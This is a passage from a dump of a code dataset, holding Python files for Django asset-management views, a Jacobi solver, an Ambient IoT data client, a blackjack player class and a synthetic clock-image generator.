sys.argv[1].split('.')\n\n\txml.save(name_fil[0]+'.xml')\n","repo_name":"HESOFTS/sexten_2017","sub_path":"model_creator/scriptModel_variable.py","file_name":"scriptModel_variable.py","file_ext":"py","file_size_in_byte":19533,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"1092841056","text":"from django.http import JsonResponse\nfrom utils import baseview\nfrom assets.models import BusinessServices, BusinessEnvironment, BusinessProject, ServiceToEnv\nfrom assets.serializers import EnvironmentSerializers, ServicesSerializers, ProjectSerializers\nfrom utils.util import now\nfrom audit.apis.audit import PutAudit\nfrom utils.auth import auth\nfrom django.db.models import Count, Q\n\n\ndef spec_str_format(data: list): # [1,2] TO ",1,2,"\n str_trans = ","\n for item in data:\n str_trans += str(item) + ","\n return str_trans\n\n\ndef spec_list_format(data: str): # ",1,2," TO [1,2]\n trans = [int(item) for item in list(filter(None, data.split(',')))]\n return trans\n\n\ndef service_bind_env_machine(machine_ids: list, env_id: int,\n service_id: int): # bind the machines of one environment to a service\n machine_ids_str = ''\n if machine_ids:\n machine_ids_str = spec_str_format(machine_ids)\n query_service = ServiceToEnv.objects.filter(env_id=env_id,\n service_id=service_id)\n if not query_service:\n ServiceToEnv.objects.create(env_id=env_id,\n service_id=service_id,\n rel_ips=machine_ids_str,\n c_time=now(),\n u_time=now())\n else:\n query_service.update(rel_ips=machine_ids_str, u_time=now(), del_tag=0)\n\n\nclass EnvironmentListView(baseview.BaseView):\n @auth("projects.edit.view")\n def get(self, request, args=None):\n serializer = EnvironmentSerializers(\n BusinessEnvironment.objects.filter(del_tag=0), many=True)\n msg = {'code': 200, 'data': serializer.data, 'msg': 'success'}\n return JsonResponse(msg)\n\n @auth("projects.edit.add")\n def post(self, request, args=None):\n data = request.data\n name = data['name'].strip() if data.get('name', None) else None\n if not name:\n return JsonResponse({\n "code": 10003,\n "data": {},\n "msg": "name required."\n })\n query_env = BusinessEnvironment.objects.filter(name=name, del_tag=0)\n data.pop("id")\n data["c_time"] = now()\n data["u_time"] = now()\n if not query_env:\n BusinessEnvironment.objects.create(**data)\n msg = {'code': 200, 'data': {}, 'msg': 'Environment added'}\n else:\n msg = {'code': 10005, 'data': {}, 'msg': 'Environment name already exists; do not add it twice'}\n PutAudit(request, msg) # audit log\n return JsonResponse(msg)\n\n @auth("projects.edit.edit")\n def put(self, request, args=None):\n data = request.data\n if "id" not in data:\n return JsonResponse({\n "code": 10003,\n "data": {},\n "msg": "id required."\n })\n id = data.get('id')\n data_name = data['name'].strip()\n data['u_time'] = now()\n query_env = BusinessEnvironment.objects.filter(del_tag=0, id=id)\n if query_env:\n query_env_name = BusinessEnvironment.objects.filter(del_tag=0,\n name=data_name)\n env_id = query_env_name[0].id if query_env_name else None\n if not env_id:\n query_env.update(**data)\n msg = {'code': 200, 'data': {}, 'msg': 'Environment updated'}\n elif env_id == id:\n query_env.update(**data)\n msg = {'code': 200, 'data': {}, 'msg': 'Environment updated'}\n else:\n msg = {'code': 10002, 'data': {}, 'msg': 'Environment name already exists; do not add it twice'}\n else:\n msg = {'code': 10003, 'data': {}, 'msg': 'Environment not found'}\n PutAudit(request, msg) # audit log\n return JsonResponse(msg)\n\n @auth("projects.edit.del")\n def delete(self, request, args=None):\n data = request.data\n id = data.get('id', None)\n if not id:\n return JsonResponse({\n "code": 10003,\n "data": {},\n "msg": "id required."\n })\n query_env = BusinessEnvironment.objects.filter(del_tag=0, id=int(id))\n if query_env:\n query_rel = ServiceToEnv.objects.filter(\n del_tag=0, env_id=id).values('service_id')\n query_service = list(\n filter(None, [item['service_id'] for item in query_rel]))\n if query_service:\n msg = {'code': 10004, 'data': {}, 'msg': 'This environment is bound to a project; unbind it first'}\n else:\n query_env.update(del_tag=1)\n msg = {'code': 200, 'data': {}, 'msg': 'Environment deleted'}\n else:\n msg = {'code': 10003, 'data': {}, 'msg': 'Environment not found; delete failed'}\n PutAudit(request, msg) # audit log\n return JsonResponse(msg)\n\n\nclass ProjectListView(baseview.BaseView):\n @auth("projects.edit.view")\n def get(self, request, args=None):\n q = Q()\n q.children.append(("del_tag", 0))\n pageNo = int(request.GET.get('page_no', 1))\n pageSize = int(request.GET.get('page_size', 10))\n query_projects = BusinessProject.objects.filter(q)\n total = query_projects.count()\n start = (pageNo - 1) * pageSize\n end = pageNo * pageSize\n serializer = ProjectSerializers(query_projects[start:end], many=True)\n msg = {\n 'code': 200,\n 'data': {\n 'project_infos': serializer.data,\n 'total': total\n },\n 'msg': 'success'\n }\n return JsonResponse(msg)\n\n @auth("projects.edit.add")\n def post(self, request, args=None):\n data = request.data\n name = data['name'].strip() if data.get('name', None) else None\n if not name:\n return JsonResponse({\n "code": 10003,\n "data": {},\n "msg": "name required."\n })\n if data['manager']:\n data['manager'] = spec_str_format(data['manager'])\n query_proj = BusinessProject.objects.filter(name=name, del_tag=0)\n data.pop("id")\n data["c_time"] = now()\n data["u_time"] = now()\n if not query_proj:\n BusinessProject.objects.create(**data)\n msg = {'code': 200, 'data': {}, 'msg': 'Project added'}\n else:\n msg = {'code': 10002, 'data': {}, 'msg': 'Project name already exists; do not add it twice'}\n PutAudit(request, msg) # audit log\n return JsonResponse(msg)\n\n @auth("projects.edit.edit")\n def put(self, request, args=None):\n data = request.data\n id = data.get('id', None)\n name = data.get('name', None)\n if not all([id, name]):\n return JsonResponse({\n "code": 10003,\n "data": {},\n "msg": "id&name required."\n })\n if data['manager']:\n data['manager'] = spec_str_format(data['manager'])\n data["u_time"] = now()\n query_proj = BusinessProject.objects.filter(del_tag=0, id=int(id))\n if query_proj:\n query_proj_id = BusinessProject.objects.filter(name=name.strip(),\n del_tag=0)\n proj_id = query_proj_id[0].id if query_proj_id else None\n if not proj_id:\n query_proj.update(**data)\n msg = {'code': 200, 'data': {}, 'msg': 'Project updated'}\n elif proj_id == int(id):\n query_proj.update(**data)\n msg = {'code': 200, 'data': {}, 'msg': 'Project updated'}\n else:\n msg = {'code': 10002, 'data': {}, 'msg': 'Project name already exists; do not add it twice'}\n else:\n msg = {'code': 10002, 'data': {}, 'msg': 'Project not found'}\n PutAudit(request, msg) # audit log\n return JsonResponse(msg)\n\n @auth("projects.edit.del")\n def delete(self, request, args=None):\n data = request.data\n id = data.get('id', None)\n if not id:\n return JsonResponse({\n "code": 10003,\n "data": {},\n "msg": "id required."\n })\n query_proj = BusinessProject.objects.filter(del_tag=0, id=int(id))\n if query_proj:\n query_service = BusinessServices.objects.filter(\n del_tag=0, rel_project=int(id))\n if not query_service:\n query_proj.update(del_tag=1)\n msg = {'code': 200, 'data': {}, 'msg': 'Project deleted'}\n else:\n msg = {'code': 10004, 'data': {}, 'msg': 'This project is bound to services; unbind them first'}\n else:\n msg = {'code': 10002, 'data': {}, 'msg': 'Project not found; delete failed'}\n PutAudit(request, msg) # audit log\n return JsonResponse(msg)\n\n\nclass ServiceListView(baseview.BaseView):\n @auth("projects.edit.view")\n def get(self, request, args=None):\n op_type = request.GET.get('type', None)\n if op_type == "get_machine_env":\n srv_id = request.GET.get('id', None)\n if not srv_id:\n msg = {'code': 10003, 'data': {}, 'msg': 'id required'}\n return JsonResponse(msg)\n else:\n srv_id = int(srv_id)\n query_env = ServiceToEnv.objects.filter(\n del_tag=0, service_id=srv_id).values('env_id')\n query_env_ids = list(\n filter(None, [env_id['env_id'] for env_id in query_env]))\n env_to_machine_list = []\n if query_env_ids:\n for env_item in query_env_ids:\n query_machine = ServiceToEnv.objects.filter(\n del_tag=0, service_id=srv_id,\n env_id=env_item).values('rel_ips')\n if query_machine[0]['rel_ips']:\n machine_ids_str = query_machine[0]['rel_ips']\n machine_ids_list = spec_list_format(machine_ids_str)\n env_to_machine_list.append({\n 'env_id':\n env_item,\n 'machine_id':\n machine_ids_list\n })\n msg = {'code': 200, 'data': env_to_machine_list, 'msg': 'success'}\n else:\n q = Q()\n q.children.append(("del_tag", 0))\n service_type = request.GET.get('service_type', None)\n project = request.GET.get('project', None)\n if service_type:\n for i in BusinessServices.type_choices:\n if i[1] == service_type:\n service_type = i[0]\n break\n q.children.append(("service_type", service_type))\n if project:\n p = BusinessProject.objects.filter(name=project).first()\n q.children.append(("rel_project", p.id))\n pageNo = int(request.GET.get('page_no', 1))\n pageSize = int(request.GET.get('page_size', 10))\n query_services = BusinessServices.objects.filter(q)\n total = query_services.count()\n start = (pageNo - 1) * pageSize\n end = pageNo * pageSize\n serializer = ServicesSerializers(query_services[start:end],\n many=True)\n msg = {\n 'code': 200,\n 'data': {\n 'service_infos': serializer.data,\n 'total': total\n },\n 'msg': 'success'\n }\n return JsonResponse(msg)\n\n @auth("projects.edit.add")\n def post(self, request, args=None):\n data = request.data\n name = data.get('name', None)\n env_machines = data.get('env_machines', None)\n data.pop('env_machines')\n data.pop("env_id")\n data.pop("rel_machine")\n rel_project = data.get('rel_project')\n service_type = data.get('service_type')\n # map the human-readable choice back to its stored value\n type_choices = BusinessServices.type_choices\n for item in type_choices:\n if item[1] == service_type:\n service_type = item[0]\n break\n if not name:\n return JsonResponse({\n "code": 10003,\n "data": {},\n "msg": "name required."\n })\n if data['manager']:\n data['manager'] = spec_str_format(data['manager'])\n query_service = BusinessServices.objects.filter(\n name=name.strip(),\n del_tag=0,\n rel_project=rel_project,\n service_type=service_type)\n if not query_service:\n data.pop('id')\n data["c_time"] = now()\n data["u_time"] = now()\n data["service_type"] = service_type\n BusinessServices.objects.create(**data)\n srv_id = BusinessServices.objects.filter(name=name.strip(),\n del_tag=0)[0].id\n for i in env_machines:\n env_id = i['env_id']\n if srv_id and env_id:\n service_bind_env_machine(service_id=int(srv_id),\n env_id=int(env_id),\n machine_ids=i['machine_id'])\n msg = {'code': 200, 'data': {}, 'msg': 'Service added'}\n else:\n msg = {'code': 10002, 'data': {}, 'msg': 'Service name already exists; do not add it twice'}\n PutAudit(request, msg) # audit log\n return JsonResponse(msg)\n\n @auth("projects.edit.edit")\n def put(self, request, args=None):\n data = request.data\n name = data.get('name', None)\n id = data.get('id', None)\n env_machines = data.get('env_machines')\n data.pop('env_machines')\n rel_project = data.get('rel_project', None)\n # map the human-readable choice back to its stored value\n service_type = data.get('service_type', None)\n if service_type:\n for i in BusinessServices.type_choices:\n if i[1] == service_type:\n service_type = i[0]\n break\n data['service_type'] = service_type\n if not all([name, id]):\n return JsonResponse({\n "code": 10003,\n "data": {},\n "msg": "id & name required."\n })\n if data['manager']:\n data['manager'] = spec_str_format(data['manager'])\n data["u_time"] = now()\n query_service = BusinessServices.objects.filter(del_tag=0, id=int(id))\n if query_service:\n query_service_id = BusinessServices.objects.filter(\n del_tag=0,\n name=name.strip(),\n rel_project=rel_project,\n service_type=service_type)\n service_id = query_service_id[0].id if query_service_id else None\n if not service_id or service_id == int(id):\n data.pop("env_id")\n data.pop("rel_machine")\n query_service.update(**data)\n # persist the environment/machine bindings\n for item in env_machines:\n env_id = item['env_id']\n if env_id:\n service_bind_env_machine(service_id=int(id),\n env_id=int(env_id),\n machine_ids=item["machine_id"])\n msg = {'code': 200, 'data': {}, 'msg': 'Service updated'}\n else:\n msg = {'code': 10003, 'data': {}, 'msg': 'Service name already exists; do not add it twice'}\n else:\n msg = {'code': 200, 'data': {}, 'msg': 'Service not found; update failed'}\n PutAudit(request, msg) # audit log\n return JsonResponse(msg)\n\n @auth("projects.edit.del")\n def delete(self, request, args=None):\n data = request.data\n id = data.get('id', None)\n if not id:\n return JsonResponse({\n "code": 10003,\n "data": {},\n "msg": "id required."\n })\n query_service = BusinessServices.objects.filter(del_tag=0, id=int(id))\n if query_service:\n query_machine = ServiceToEnv.objects.filter(\n del_tag=0, service_id=int(id)).values('rel_ips')\n machine_ids = list(\n filter(None,\n [rel_ips['rel_ips'] for rel_ips in query_machine]))\n if machine_ids:\n msg = {'code': 10004, 'data': {}, 'msg': 'This service is bound to machines; unbind them first'}\n else:\n query_service.update(del_tag=1)\n ServiceToEnv.objects.filter(del_tag=0,\n service_id=int(id)).update(\n del_tag=1) # deleting the service also removes its bindings\n msg = {'code': 200, 'data': {}, 'msg': 'Service deleted'}\n else:\n msg = {'code': 10002, 'data': {}, 'msg': 'Service not found; delete failed'}\n PutAudit(request, msg) # audit log\n return JsonResponse(msg)\n","repo_name":"MX-Steve/backend_main","sub_path":"assets/apis/configuration_centre.py","file_name":"configuration_centre.py","file_ext":"py","file_size_in_byte":17389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
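`spec_str_format` and `spec_list_format` above are inverses apart from the comma sentinels; a quick round-trip check using standalone copies of the two helpers:

def spec_str_format(data):
    # [1, 2] -> ",1,2,"
    return "," + "".join(str(item) + "," for item in data)

def spec_list_format(data):
    # ",1,2," -> [1, 2]; filter(None, ...) drops the empty ends
    return [int(item) for item in filter(None, data.split(','))]

ids = [3, 17, 42]
assert spec_list_format(spec_str_format(ids)) == ids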
\"Iteration \" + str(iteration + 1) + \": \" + str(x) + \"\\n\"\n message += \"Difference: \" + str(x - xx) + \"\\n\\n\"\n\n x = xx\n return x\n\n\ndef demonstration():\n n, A, b, exp = user_input()\n print(\"\\nEquation system:\")\n print_equation_system(n, A, b)\n x = Jacobi(n, A, b, exp)\n print(\"\\nIterations:\")\n print(message)\n print(\"Solution:\")\n print(x)\n\n\nif __name__ == \"__main__\":\n demonstration()\n\n\n\n # A = np.array([[5.4, -6.2, -0.5], [3.4, 2.3, 0.8], [2.4, -1.1, 3.8]])\n #\n # b = np.array([0.52, -0.8, 1.8])\n # 5.4 -6.2 -0.5\n # 3.4 2.3 0.8\n # 2.4 -1.1 3.8\n # 0.52 -0.8 1.8\n\n # 10 1 -1\n # 1 10 -1\n # -1 1 10\n # 11 10 10","repo_name":"sophiashuv/numericalMethods-AMI23","sub_path":"04_Jacobi_method/JacobiMethod.py","file_name":"JacobiMethod.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"41027257572","text":"class Ambient:\n def __init__(self, channelId, writeKey, readKey=None, userKey=None, ssl=False, debug=False):\n try:\n import urequests\n self.requests = urequests\n self.micro = True\n except ImportError:\n import requests\n self.requests = requests\n self.micro = False\n import time\n self.time = time\n\n self.channelId = channelId\n self.writeKey = writeKey\n self.readKey = readKey\n self.userKey = userKey\n self.ssl = ssl\n self.debug = debug\n\n if self.debug:\n self.url = 'http://192.168.33.13/api/v2/channels/' + str(channelId)\n else:\n if self.ssl and not self.micro:\n self.url = 'https://ambidata.io/api/v2/channels/' + str(channelId)\n else:\n self.url = 'http://ambidata.io/api/v2/channels/' + str(channelId)\n\n self.lastsend = 0\n\n def send(self, data, timeout = 30.0):\n millis = self.time.time() * 1000.0 if not self.micro else self.time.ticks_ms()\n if self.lastsend != 0 and (millis - self.lastsend ) < 4999:\n if self.micro:\n r = self.requests.Response(None)\n else:\n r = self.requests.Response()\n r.status_code = 403\n return r\n if isinstance(data, list):\n __d = data\n else:\n __d = [data]\n if self.micro:\n r = self.requests.post(self.url + '/dataarray', json = {'writeKey': self.writeKey, 'data': __d}, headers = {'Content-Type' : 'application/json'})\n else:\n r = self.requests.post(self.url + '/dataarray', json = {'writeKey': self.writeKey, 'data': __d}, headers = {}, timeout = timeout)\n millis = self.time.time() * 1000.0 if not self.micro else self.time.ticks_ms()\n self.lastsend = millis\n return r\n\n def read(self, **args):\n url = self.url + '/data'\n __o = []\n if hasattr(self, 'readKey'):\n __o.append('readKey=' + self.readKey)\n if 'date' in args:\n __o.append('date=' + args['date'])\n else:\n if 'start' in args and 'end' in args:\n __o.append('start=' + args['start'])\n __o.append('end=' + args['end'])\n else:\n if 'n' in args:\n __o.append('n=' + str(args['n']))\n if 'skip' in args:\n __o.append('skip=' + str(args['skip']))\n if len(__o) > 0:\n url = url + '?' + '&'.join(__o)\n timeout = 30.0\n if 'timeout' in args:\n timeout = args['timeout']\n if self.micro:\n self.r = self.requests.get(url)\n else:\n self.r = self.requests.get(url, timeout = timeout)\n return list(reversed(self.r.json()))\n\n def getprop(self, **args):\n url = self.url\n if hasattr(self, 'readKey'):\n url = url + '?' 
+ 'readKey=' + self.readKey\n timeout = 30.0\n if 'timeout' in args:\n timeout = args['timeout']\n if self.micro:\n self.r = self.requests.get(url)\n else:\n self.r = self.requests.get(url, timeout = timeout)\n self.prop = self.r.json()\n return self.prop\n\n def putcmnt(self, t, cmnt, timeout = 30.0):\n if self.micro:\n r = self.requests.put(self.url + '/data', json = {'writeKey': self.writeKey, 'created': t, 'cmnt': cmnt}, headers = {'Content-Type' : 'application/json'})\n else:\n r = self.requests.put(self.url + '/data', json = {'writeKey': self.writeKey, 'created': t, 'cmnt': cmnt}, headers = {}, timeout = timeout)\n return r\n\n def sethide(self, t, hide, timeout = 30.0):\n if self.micro:\n r = self.requests.put(self.url + '/data', json = {'writeKey': self.writeKey, 'created': t, 'hide': hide}, headers = {'Content-Type' : 'application/json'})\n else:\n r = self.requests.put(self.url + '/data', json = {'writeKey': self.writeKey, 'created': t, 'hide': hide}, headers = {}, timeout = timeout)\n return r\n","repo_name":"AmbientDataInc/ambient-python-lib","sub_path":"ambient.py","file_name":"ambient.py","file_ext":"py","file_size_in_byte":4149,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"61"} +{"seq_id":"22962982086","text":"from src.hand import hand\nfrom src.config import config\nfrom random import randint\n\nclass player:\n strats = [\"basic\", \"standat17\", \"rand\"]\n\n def __init__(self, pos, dealer, comp, strat):\n self.isComp = comp\n if comp:\n self.strat = strat\n if self.strat == \"any\":\n self.strat = self.strats[randint(0, 2)]\n if dealer:\n self.state = \"idle\"\n else:\n self.money = config[\"setup\"][\"start money\"]\n self.state = \"playing\"\n self.pos = pos\n self.hand = hand()\n","repo_name":"connor-isaias-white/blackjack","sub_path":"src/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37188377405","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n\"\"\"\nNeeds 10s of thousands of images: 128x128 is min size, else it gets blurred. 
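`Ambient.send()` above rate-limits writes to one batch roughly every 5 seconds and returns a synthetic 403 response when called too soon. The gate can be exercised without any network I/O; a sketch of just the timing logic, with MicroPython's `ticks_ms` replaced by `time.time`:

import time

class Throttle:
    def __init__(self, min_interval_ms=5000):
        self.min_interval_ms = min_interval_ms
        self.lastsend = 0

    def allowed(self):
        now_ms = time.time() * 1000.0
        if self.lastsend != 0 and (now_ms - self.lastsend) < self.min_interval_ms - 1:
            return False  # the caller would get the synthetic 403, as in Ambient.send
        self.lastsend = now_ms
        return True

gate = Throttle()
print(gate.allowed())  # True
print(gate.allowed())  # False (second call inside the 5 s window)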
dpi = 72\nNow variations possible: 12x60 = 720\nRadius and ring variance: 5 and 2 = 10 + 5 (5 chose 2) + (5 Chose 1); This is 6 chose 2\nPerhaps 3 and 2\nIt's hard to make it equi-probable so map 1 to 6 to configurations.\n#Thickness of each ring could be one of two values: 5 will change to 10; 10 will change to 40 = 50x\n3 Choose 2 = 2*3 = 6x\nTicks width and length could be chaged: 4x\nAdd inner minute tick: 2x\nWidth and length of needle changed: 4x\n\n= 6 x 4 x 2 x 4 = 196\n\nIf I choose 3 out of 5 positions\n\"\"\"\n#import matplotlib.pyplot as plt\nfrom matplotlib import figure\n#import matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.patches import Circle\nimport matplotlib.patches as patches\nimport io\n#from IPython.core.display import display, HTML\n#display(HTML(\"\"))\n#%config Completer.use_jedi = False\n\n\n# In[2]:\n\n\ndef addTick(ax, theta, cX = 45, cY = 45, radius = 40, t_angle = 2,\n width=5, hatch = \" \", color=\"black\"):\n \"\"\"\n This function simply add a tick,\n It does so by calculating two points and adding a line between them.\n t_angel will sweep theta-t_angel and theta + t_angel\n \"\"\"\n #First convert theta to radians.\n t1 = np.pi*(theta - t_angle)/180\n t2 = np.pi*(theta + t_angle)/180\n \n #Now generate Nx2 i.e, 4x2 points for our polygon\n points = np.zeros((4, 2))\n \n for i in range(4):\n if i == 0:\n #inner left point\n r = radius - width\n t = t1\n elif i == 1:\n #inner right\n r = radius - width\n t = t2\n elif i == 2:\n #outer right\n r = radius\n t = t2\n else:\n #outer left\n r = radius\n t = t1\n points[i, 0] = cX + r * np.cos(t)\n points[i, 1] = cY + r * np.sin(t)\n #ax.add_patch(patches.Polygon(points, hatch = hatch)) #, color='black'\n if hatch == \" \":\n ax.add_patch(patches.Polygon(points, color=color))\n else:\n ax.add_patch(patches.Polygon(points, hatch=hatch))\n\n\n# In[3]:\n\n\ndef addNeedle(ax, theta, cX = 45, cY = 45, radius = 35, t_angle = 1,\n hatch=\" \", color=\"black\"):\n \"\"\"\n This will add the needle at the desired theta, and length would be dictated by radius.\n It will add a very soimple square needle.\n It will be 5 times to one side.. 
so t_angle will be multiplied by 5 in opposite direction.\n \"\"\"\n t_rad = t_angle*np.pi/180\n #Now generate Nx2 i.e, 4x2 points for our polygon\n points = np.zeros((4, 2))\n \n for i in range(4):\n if i == 0:\n #back left point\n r = -radius/5\n t = theta + t_rad*5\n elif i == 1:\n #back right\n r = -radius/5\n t = theta - t_rad*5\n elif i == 2:\n #front right\n r = radius\n t = theta + t_rad\n else:\n #front left\n r = radius\n t = theta - t_rad\n points[i, 0] = cX + r * np.cos(t)\n points[i, 1] = cY + r * np.sin(t)\n if hatch == \" \":\n ax.add_patch(patches.Polygon(points, color=color))\n else:\n ax.add_patch(patches.Polygon(points, hatch=hatch))\n\n\n# In[8]:\n\n\npatterns = [\" \", \"/\" , \"\\\\\" , \"///\", \"////\", \"---\", \"|\" , \"-\" , \"+\" , \"x\", \"o\", \"O\", \".\", \"*\" ]\ndef getClock(h=3, m = 10, simp=True, cX = 90, cY = 90, r1 = 62, r2 = 72, \n lw1 = 3, lw2 = 3,\n tickA = 1, tickW = 4, iTickR = 40,\n hR = 40, hA = 2, mR = 60, mA = 1):\n \"\"\"\n If simp is false then color etc are generated randomly!!!\n \"\"\"\n global patterns\n fig = figure.Figure()\n ax = fig.subplots(1)\n fig_size = 2.5\n dpi = 72\n canv_width = int(fig_size*dpi)\n if r1 is not None and r1 != 0:\n radius = r1\n else:\n radius = r2\n fig.set_size_inches(fig_size, fig_size)\n if simp:\n c_canvas =np.ones((canv_width, canv_width, 3), dtype=float)\n else:\n c_canvas =np.random.random((canv_width, canv_width, 3))*0.1 + 0.3\n kp = int(np.random.random()*3)%3\n ch = [0, 1, 2]\n ch.remove(kp)\n c_canvas[:,:,ch] = 0\n ax.imshow(c_canvas)\n ax.set_aspect('equal')\n circ1 = None\n color = np.random.rand(3)\n if simp:\n if r1 is not None and r1 != 0:\n circ1 = Circle((cX, cY), r1, linewidth = lw1, fill = False,\n color=color)\n color = color*(min(1.0, 0.5 + np.random.rand()/2))\n circ2 = Circle((cX, cY), r2, linewidth = lw2, fill = False,\n color=color)\n else:\n if r1 is not None and r1 != 0:\n rgb = [ (np.random.random()*0.5 + 0.3) for _ in range(3)]\n rgb.append(1)\n circ1 = Circle((cX, cY), r1, linewidth = lw1, color=rgb)\n rgb = [ (np.random.random()*0.5 + 0.3) for _ in range(3)]\n rgb.append(1)\n circ2 = Circle((cX, cY), r2, linewidth = lw2, fill = False, color=rgb)\n if circ1 is not None:\n ax.add_patch(circ1)\n ax.add_patch(circ2)\n \n htachIdx = 0\n color = 0.9*np.random.rand(3)\n if not simp:\n htachIdx = int(np.random.random()*len(patterns))%len(patterns)\n \n for i in range(12):\n addTick(ax, -30*i, cX = cX, cY = cY, t_angle = tickA if simp else (2+((i+2)%3)//2), \n width=tickW, radius = radius, hatch=patterns[htachIdx],\n color = color)\n if iTickR is not None:\n color = 0.9*np.random.rand(3)\n for i in range(60):\n addTick(ax, 6*i, cX = cX, cY = cY, t_angle = 1, \n width=2, radius = iTickR, hatch=patterns[htachIdx],\n color = color)\n \n #Now add a time, assume that h and m will always be in correct range.\n h = h%12 #As we are in 12 hour mode\n hTheta = (h + m/60)/12*2*np.pi -np.pi/2\n mTheta = m/60*2*np.pi -np.pi/2\n color = 0.9*np.random.rand(3)\n addNeedle(ax, mTheta, cX = cX, cY = cY, radius = mR, \n t_angle=mA if simp else 2, \n hatch=patterns[htachIdx], color=color)\n addNeedle(ax, hTheta, cX = cX, cY = cY, radius = hR, \n t_angle=hA if simp else 3.5,\n hatch=patterns[htachIdx], color=color)\n #print(type(ax.images[0]), type(ax), dir(ax.images[0]), type(ax.images[0].make_image), dir(ax))\n \n \n io_buf = io.BytesIO()\n fig.savefig(io_buf, format='raw', dpi=dpi)#DPI)\n io_buf.seek(0)\n img_arr = np.reshape(np.frombuffer(io_buf.getvalue(), dtype=np.uint8),\n 
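`addTick` builds each tick mark as a four-point polygon in polar coordinates (inner-left, inner-right, outer-right, outer-left). The vertex math in isolation, no matplotlib required:

import numpy as np

def tick_polygon(theta_deg, cx=45, cy=45, radius=40, t_angle=2, width=5):
    # two angles sweeping theta +/- t_angle, at the inner and outer radii
    t1 = np.radians(theta_deg - t_angle)
    t2 = np.radians(theta_deg + t_angle)
    pts = []
    for r, t in [(radius - width, t1), (radius - width, t2), (radius, t2), (radius, t1)]:
        pts.append((cx + r * np.cos(t), cy + r * np.sin(t)))
    return np.array(pts)

print(tick_polygon(0))  # the 3 o'clock tick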
#newshape=(int(fig.bbox.bounds[3]), int(fig.bbox.bounds[2]), -1))\n newshape=(int(fig_size*dpi), int(fig_size*dpi), -1))\n io_buf.close()\n #fig.close()\n #print(img_arr.shape)\n #plt.imshow(img_arr)\n #plt.show()\n \n mar = 26#8#0.125*64\n delta = 2\n ad_delta = 0\n #print(\"fig.dpi: \",fig.dpi)\n if fig.dpi != 72:\n ad_delta = 1\n end = int(fig_size*dpi) - mar#64+8 #256//s_down+y_mar\n mar += ad_delta\n end += ad_delta\n ret_img = img_arr[mar:end, mar+delta:end+delta][:,:,:3]\n #del(io_buf)\n #del(img_arr)\n #plt.clf()\n #del(plt)\n #del(ax)\n #plt.close('all')\n #print(\"Closing all\")\n return ret_img\n\n\n# In[9]:\n\n\ndef getCenter(mv_mar, randSeed = None):\n if mv_mar < 0: mv_mar = 0\n if randSeed is None:\n np.random.seed()\n mv_mar = np.random.randint(mv_mar)\n if randSeed is None:\n np.random.seed()\n if mv_mar > 10:\n if np.random.randint(mv_mar) > 5:\n mv_mar = 5\n if randSeed is None:\n np.random.seed()\n if np.random.randint(2) == 0:\n mv_mar = -1\n return 90 + mv_mar\n\n\n# In[10]:\n\n\ndef getRandomClock(simp = True, randSeed = None,\n clkSize=-1, h = -1, m = -1):\n \"\"\"It will simply generate a random clock.\n Howvere its best to set the seed before this function.\n \n if randSeed is given then it is guranteed that if other \n parmas are not varied than same clock would be produced.\n \n clkSize: Take 0, 1, 2 (larger values are clipped)\n This is outer ring which is r2, 0, 1, 2: 42-62-82\n \n r1 is smaller radius\n \n \"\"\"\n org_r_state = None\n if randSeed is not None:\n if randSeed != -1:\n org_r_state = np.random.get_state()\n np.random.seed(randSeed)\n else:\n np.random.seed()\n if clkSize == -1: clkSize = np.random.randint(3)\n if h == -1: h = np.random.randint(12)\n else: np.random.randint(12) #Hack to get random and not random clocks!!\n if randSeed is None:\n np.random.seed()\n if m == -1: m = np.random.randint(60)\n else: np.random.randint(60)\n #print(\"Updated code: h: \",h,\" and m:\",m)\n #First r2 can vary from 82 to 52\n r2 = 80\n if clkSize == 1:\n r2 = 70\n elif clkSize < 1:\n r2 = 60\n if randSeed is None:\n np.random.seed()\n r = np.random.randint(18)\n r2 -= r#\n #Now r1 will be 7 to 14 smaller\n if randSeed is None:\n np.random.seed()\n r = np.random.randint(7) + 5\n r1 = r2-r\n #Should r1 (inner radius) be made 0? 
\n if randSeed is None:\n np.random.seed()\n if(np.random.randint(3) == 0):\n r1 = 0\n #r1 = 0\n #Now based on r1, one may shift cX and cY\n cX = getCenter(82-r2, randSeed)\n cY = getCenter(82-r2, randSeed)\n #print(82-r2, cX, cY)\n if randSeed is None:\n np.random.seed()\n lw2 = np.random.randint(4 if r2>60 else 2) + 2\n if randSeed is None:\n np.random.seed()\n lw1 = np.random.randint(2) + 1\n \n #if r2 < 60\n \n mR = r2 if r1 == 0 else r1\n #Now lets change tickA (its width) and tickW (it's length)\n if randSeed is None:\n np.random.seed()\n tickA = np.random.randint(3) + 1\n tickW = np.random.randint(5) + 3\n if r1 > 40:\n tickW += (r1-40)//10\n #\n if randSeed is None:\n np.random.seed()\n iTickR = np.random.randint(20)\n if iTickR < 5:\n iTickR = None\n else:\n iTickR = mR - iTickR\n \n #Now width and length of needles...\n if randSeed is None:\n np.random.seed()\n mR = mR -5 -np.random.randint(5)\n hR = mR - 6\n hR -= np.random.randint(5)\n \n if randSeed is None:\n np.random.seed()\n mA = 1 + np.random.randint(2)\n hA = mA +1 + np.random.randint(2)\n #if hA > 4:\n # hA = 4\n #h=3, m = 10, simp=True, cX = 90, cY = 90, r1 = 62, r2 = 72, \n # lw1 = 3, lw2 = 3,\n # tickA = 1, tickW = 4, iTickR = 40,\n # hR = 40, hA = 2, mR = 60, mA = 1\n clk, h_m = getClock(h=h, m=m, simp=simp, cX=cX, cY=cY, \n r1=r1, r2=r2, lw1=lw1, lw2=lw2,\n tickA=tickA, tickW=tickW, iTickR=iTickR,\n hR = hR, hA = hA, mR = mR, mA = mA\n ), [h, m]\n if org_r_state is not None:\n np.random.set_state(org_r_state)\n return clk, h_m\n\n\n# In[17]:\n\"\"\"\nfrom tqdm import tqdm\nimport pickle\nopFolder = \"../../../data/clock/\"\nfor i in tqdm(range(1000000)):\n with open(opFolder+str(i)+'.pkl','wb') as f:\n 